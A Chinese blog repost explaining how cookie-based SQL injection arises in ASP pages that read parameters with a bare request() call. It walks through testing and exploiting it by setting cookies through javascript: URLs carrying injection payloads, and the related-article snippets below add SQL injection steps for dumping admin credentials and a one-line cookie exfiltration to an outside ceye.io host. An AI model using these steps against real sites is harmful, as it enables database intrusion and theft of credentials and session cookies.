cookie注入的形成,原理,利用总结

最新推荐文章于 2024-05-23 16:08:37 发布
最新推荐文章于 2024-05-23 16:08:37 发布
阅读量92 收藏
点赞数
文章标签: javascript ViewUI
原文链接:http://www.cnblogs.com/wangluochong/p/3405257.html
版权

一:cookie注入的形成

程序对提交数据获取方式是直接request("c.s.t")的方式.未指明使用request对象的具体方法进行获取。

 

二:原理

request("c.s.t"),这就是未指明使用request对象的具体方法进行获取。

request.querystring("c.s.t"),这是获取get提交数据的;

request.form("c.s.t"),这是获取post提交的数据的;

未指明使用request对象的具体方法进行获取,可以都接收get,post,cookie方式提交的数据。

一般程序只是过滤了get和post注入,如果没有过滤cookie注入语句,我们就可以进行注入了。

 

三:利用:

1:判断是否存在cookie注入

要判断是否存在cookie注入的可能,我们可以使用下面的方法判断该页面是采取什么方式接受数据的

我们首先要访问正常的页面,即是:http://www.fenghuohack.com /article.asp?id=1,等页面打开之后,我们将IE地址栏清空,然后写 上:javascript:alert(document.cookie="id="+escape("1")); 这里的“id=”便是“article.asp?id=1”中的“id=”,“escape("1")”中的“1”是 “article.asp?id=1”中的“id=1”了,这两处要根据实际情况来定义。之后按下回车网页中会弹出一个对话框。

更改好了cookie后,我们就要试下能不能正常访问了,在另外一个窗口中我们打开以下地址:http://www.fenghuohack.com /article.asp? 既是将“id=1”去掉后的,然后看是否能正常访问。

如果可以正常显示,那么就是以request("c.s.t")方式获取数据的,一般只是过滤了get和post注入,如果没有过滤cookie注入语句,我们就可以进行注入了。

2:注入方法:

cookie的方法其实与普通的注入差不多,我们再回到刚才更改cookie的页面,然后在浏览器地址栏处填写

javascript:alert(document.cookie="id="+escape("1 and 2=2"));

回车后再去

http://www.fenghuohack.com /article.asp? 刷新页面,看页面是否正常,

如果正常我们再提交 javascript:alert(document.cookie="id="+escape("1 and 2=3")); 然后再去刷新。

如果你看见出错了,那么说明存在注入的。把javascript:alert(document.cookie="id="+escape("1 and 2=2")); 后面的and 2=2改成sql语句即可!

转载于:https://www.cnblogs.com/wangluochong/p/3405257.html

weixin_30618985
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用hackbar进行sql注入简单实例
Ro_kin的博客
07-16 1万+
这个简单的实例是对一个网址进行sql注入,获得管理员的账号和密码目标网址:http://www.xxx/news_detail.php?id=186步骤如下: (1)先猜解当前网页的字段数 在hackbar的输入框中输入: http://www.xxx/news_detail.php?id=186 order by 7 页面显示正常,输入 http://www.xxx/news_deta
cookie注入原理详解
weixin_50464560的博客
07-16 6434
那我们还是围绕以下几个问题来看看cookie注入: 1.什么是cookie注入? 2.为什么要cookie注入? 3.怎样cookie注入? 1.什么是cookie注入?   ♦cookie注入原理是:就要修改cookie的值,   ♦cookie注入原理也和平时的注入一样,只不过说我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post...
关于sql注入cookie注入
whatday的专栏
12-05 7509
小知识:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP会员密码大多就是通过W
java cookie注入_cookie注入原理详解(一)
weixin_39890543的博客
02-13 359
那我们还是围绕以下几个问题来看看cookie注入:1.什么是cookie注入?2.为什么要cookie注入?3.怎样cookie注入?1.什么是cookie注入?♦cookie注入原理是:就要修改cookie的值,♦cookie注入原理也和平时的注入一样,只不过说我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post方式提交,get方式提交就是直接在网址后面加上需...
Cookie注入是怎样产生的
weixin_33725807的博客
01-12 373
现在很多网站都加了防注入系统代码,你输入注入语句将无法注入~~ 感觉这样的防注入系统不错,但防注入系统没有注意到 Cookies 的问题! 所以就有了Cookies注入~~ 我们来研究一下怎样情况下才会有Cookies注入! 如果你学过ASP 你应该会知道Request.QueryString(GET) 或Request.Form(POST)! 呵,没错,这就...
cookie攻击
11-29
cookie注入攻击,很详细,包括COOKIE格式,Cookie欺骗原理利用JavaScript来设置cookie
Shiro-EXP:Apache Shiro 反序列化漏洞检测与利用工具,一键注入内存马
05-26
与项目相关文章首发于:Shiro exp使用手册Shiro rememberMe反序列化漏洞漏洞原理Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie,服务端对rememberMe的cookie值...
AppScan安全测试总结.docx
06-30
获得所有页面之后利用SQL注入原理进行测试是否存在注入点以及跨站脚本攻击的可能;同时还会对cookie管理、会话周期等常见的web安全漏洞进行检测。 AppScan功能十分齐全,支持登录功能并且拥有十分强大的报表。在扫描...
JBoss Seam 工作原理、seam和hibernate的范例、RESTFul的seam、seam-gen起步、seam组件、配置组件、jsf,jboss、标签、PDF、注解等等
03-09
1.2.2. 工作原理........................................................................................................................................................... 26 1.3. Seam 中的可点击列表:...
Cookies 欺骗漏洞的防范方法(vbs+js 实现)
01-02
如果大家发现了代码中的任何问题,欢迎拍砖~本人皮厚~ 一、攻击原理 Cookies 欺骗主要利用当前网络上一些用户管理系统将用户登录信息储存在 Cookies 中这一不安全的做法进行攻击,其攻击方法相对于 SQL 注入漏洞等...
关于Cookie注入学习心得
x_nirvana的博客
12-10 4819
一,Cookie的来源和作用                  Cookie最先是由Netscape(网景)公司提出的,Netscape官方文档中对Cookie的定义是这样的:Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。就是某些网站为了辨别网站用户身份而进行对session追踪结果的记录,浏览器不同Cookie存储的位置也不尽相同。而Cookie的作用则很
经典的注入语句
数据库天地
10-04 141
经典的注入语句 注意:对于普通的get注入,如果是字符型,前加' 后加 and ''=' 拆半法 ###################################### and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。 and exists (s...
ceye的利用
Matthew
08-27 7339
上次想利用ceye,但网上介绍利用的比较少,然后自己就整理了一下。 原理可以参考这几篇文章: https://forum.90sec.org/thread-9473-1-3.html 在SQL注入中使用DNS获取数据:http://drops.wooyun.org/tips/5283   当你苦于没有cloudeye的时候,有一些没有回显的结果的时候就比较苦恼。介绍一个免费的,利用cey
Hackbar 使用教程
wxy201008的博客
09-01 4万+
Hackbar 使用教程 什么是Hackbar? Hackbar是一个Firefox的插件,它的功能类似于地址栏,但是它里面的数据不受服务器的相应触发的重定向等其它变化的影响. 有网址的载入于访问****,联合查询**,各种编码,数据加密功能. 这个Hackbar可以帮助你在测试SQL注入**,XSS漏洞和网站的安全性****,主要是帮助开发人员做代码的安全审计**,检查代码,寻找安全漏洞 ———...
【渗透测试】cookie注入笔记
谈论现实
01-12 1952
目录什么是cookie?什么是cookie注入Cookie手注流程一、判断注入点二、判断字段数三、判断回显点四、查询相关内容补充答疑1.为什么是select 1,2 不是 select 1,2,3?2.你咋判断一定是md5?3.如何排查网站有cookie注入漏洞的?4.我都是先学工具后补知识?5.挖洞的话,可以用工具扫吗?6.access 语法比较严谨,那怎么得到他的库名和表名?常见的表名与表项 什么是cookieCookie = 网站身份 指某些网站为了辨别用户身份,进行 session 跟踪而
通过iframe标签绕过csp
weixin_30602505的博客
07-12 642
iframe.php代码如下: allow-popups开启时,window.open就可以打开新的窗口。 看csp规则,默认是在当前域内,如果这是一个ctf题的话,就很简单了,window.location.href='http://aa.xxxx.ceye.io?'+document.cookie;能把cookie传出来。 但是要是远程加载js文件是不满足csp规则的。 ...
Cookie注入实战(非SQL注入
热门推荐
神棍之路
11-08 7万+
cookie注入原理其实很简单,就是利用了session机制中的特性,只能说是特性,不能算是漏洞。 这里简单的说下原理,session的机制就相当于你有一张蛋糕店的会员卡,这张会员卡就是你浏览器中的cookie,上边有你的id号等信息,但是是否有效和有多少余额只能由店里边的柜员机决定,这个柜员机就是服务器上的session管理器,注入就好比有人偷偷的复制了你的会员卡(cookie),拿去店里消费
ant design DatePicker日期选择框指定分钟的间隔minuteStep属性
u010234868的专栏
05-17 235
在上面的例子中,DatePicker 将只允许用户以 15 分钟为间隔选择分钟。是 Ant Design 的 TimePicker时间选择框组件的一个属性。设置为 30,则用户可以选择以 30 分钟为间隔的分钟值。如果你想让分钟选项只能以 15 分钟为间隔选择,你可以将。
js知识点汇总之let const 和 var的区别
最新发布
fyw1789的博客
05-23 1292
声明的变量会先在作用域中被创建出来,但因此时还未进行词法绑定,所以是不能被访问的,如果访问就会抛出错误。因此,在这运行流程进入作用域创建变量,到变量可以被访问之间的这一段时间,就称之为暂时死区。其实上面不存在变量提升的例子中,其实也是暂时性死区,因为它有暂时性死区的概念,所以它压根就不存在变量提升了。实际上保证的,并不是变量的值不得改动,而是变量指向的那个内存地址所保存的数据不得改动。中的作用域有:全局作用域、函数作用域,命令声明变量之前,该变量都是不可用的。,导致绑定这个块级作用域,
cookie注入原理
05-28
它的原理主要是利用Cookie机制的缺陷,攻击者通过修改或者伪造Cookie来获取用户的权限或者信息。 Cookie是在HTTP协议中用于保存用户状态的一种机制,它通过在用户浏览器中保存一些信息来跟踪用户的状态。当用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值